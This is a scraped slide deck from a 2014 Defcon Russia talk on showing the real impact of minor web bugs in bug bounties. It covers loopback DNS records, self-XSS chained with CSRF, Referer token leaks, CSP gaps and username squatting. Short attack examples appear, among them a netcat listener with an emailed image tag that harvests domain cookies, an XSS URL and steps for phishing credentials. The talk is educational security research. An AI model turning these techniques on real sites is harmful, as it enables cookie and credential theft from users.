![Page 1: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/1.jpg)
Покажите нам Impact! Доказываем угрозу в сложных условиях
30/08/2014 DCG #7812
Г. Санкт-Петербург
@sergeybelove
![Page 2: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/2.jpg)
Work/Activity BugHuting Speaker/CTF
Hey
Defcon Russia (DCG #7812) 2
![Page 3: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/3.jpg)
Bug Bounty
Defcon Russia (DCG #7812) 3
![Page 4: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/4.jpg)
Bug Bounty
Defcon Russia (DCG #7812) 4
![Page 5: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/5.jpg)
Something wrong but i don't know what
Defcon Russia (DCG #7812) 5
![Page 6: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/6.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 6
![Page 7: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/7.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 7
XXXYYYZZZ.target.com => 127.0.0.1
What’s wrong?
![Page 8: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/8.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 8
![Page 9: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/9.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 9
External IP – 12.34.56.78 Loopback – 127.0.0.1
![Page 10: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/10.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 10
Attacker: 1) nc –lv 10024 2) email to [email protected] with <img src = http://xxyyzz.target.com:10024 > Victim: 1) Open email and... 2) Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)
![Page 11: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/11.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 11
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml
![Page 12: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/12.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 12
![Page 13: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/13.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 13
XXXYYYZZZ.target.com => 10.0.0.22
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
![Page 14: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/14.jpg)
Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 14
https://hackerone.com/reports/1509 - $100
![Page 15: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/15.jpg)
Defcon Russia (DCG #7812) 15
Situation #2 – Self XSS
![Page 16: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/16.jpg)
Situation #2 – Self XSS
Defcon Russia (DCG #7812) 16
XSS only for you – no impact?
![Page 17: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/17.jpg)
Situation #2 – Self XSS
Defcon Russia (DCG #7812) 17
![Page 18: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/18.jpg)
Situation #2 – Self XSS
Defcon Russia (DCG #7812) 18
Requirements: 1)CSRF for logout O_o 2)CSRF for login o_O
![Page 19: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/19.jpg)
Situation #2 – Self XSS
Defcon Russia (DCG #7812) 19
Steps:
1) Save (self)XSS for you 2) Logout victim 3) Login victim w/ your creds 4) Draw window
5) Catch user’s creds!
![Page 20: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/20.jpg)
Situation #2 – Self XSS
Defcon Russia (DCG #7812) 20
Google and self-XSS
![Page 21: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/21.jpg)
Situation #2 – Self XSS
Defcon Russia (DCG #7812) 21
Share account and attack your victim
![Page 22: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/22.jpg)
Situation #3 – evil HTTP referers
Defcon Russia (DCG #7812) 22
![Page 23: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/23.jpg)
Situation #3 - HTTP referer
Defcon Russia (DCG #7812) 23
<a href=“http://external.com”>Go!</a> In request headers: ... Referer: http://yoursite.com/ ... But what about external resources on web page such as images, styles...?
![Page 24: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/24.jpg)
Situation #3 - HTTP referer
Defcon Russia (DCG #7812) 24
http://super-website.com/user/passRecovery?t=SECRET
... <img src=http://comics-are-awesome.com/howto-choose-
password.jpg> ...
Owner of
comics-are-awesome.com know all _SECRET_ tokens (from referer)!
![Page 25: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/25.jpg)
Situation #3 - HTTP referer
Defcon Russia (DCG #7812) 25
https://hackerone.com/reports/738 - $100
![Page 26: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/26.jpg)
Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 26
![Page 27: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/27.jpg)
Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 27
![Page 28: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/28.jpg)
Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 28
CSP only for some browsers! Is it ok?
![Page 29: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/29.jpg)
Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 29
1) Forks with diff UA 2) Proxy cache 3) Load balancer...
Bug hunter got $100, but...
![Page 30: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/30.jpg)
Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 30
Fail! Why: • ‘Partial support in Internet Explorer 10-11 refers to the
browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header.
• Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages.
• Chrome for iOS fails to render pages without a connect-src 'self' policy.
• Old FF problems (some versions between XX and YY)
![Page 31: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/31.jpg)
Situation #6 - Usernames
Defcon Russia (DCG #7812) 31
![Page 32: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/32.jpg)
Situation #6 - Usernames
Defcon Russia (DCG #7812) 32
http://website.com/username
![Page 33: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/33.jpg)
Situation #6 - Usernames
Defcon Russia (DCG #7812) 33
Okay! Let’s register: http://website.com/robots.txt
http://website.com/sitemap.xml ...
![Page 34: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/34.jpg)
Situations XXX
Defcon Russia (DCG #7812) 34
![Page 35: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/35.jpg)
Situations XXX
Defcon Russia (DCG #7812) 35
• Info disclose via CSS files (full path disclosure while compilation - file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/browser-not-supported\.scss (bug #2221)
• SPF and same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true
![Page 36: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/36.jpg)
Defcon Russia (DCG #7812) 36
Thanks! Questions?
@sergeybelove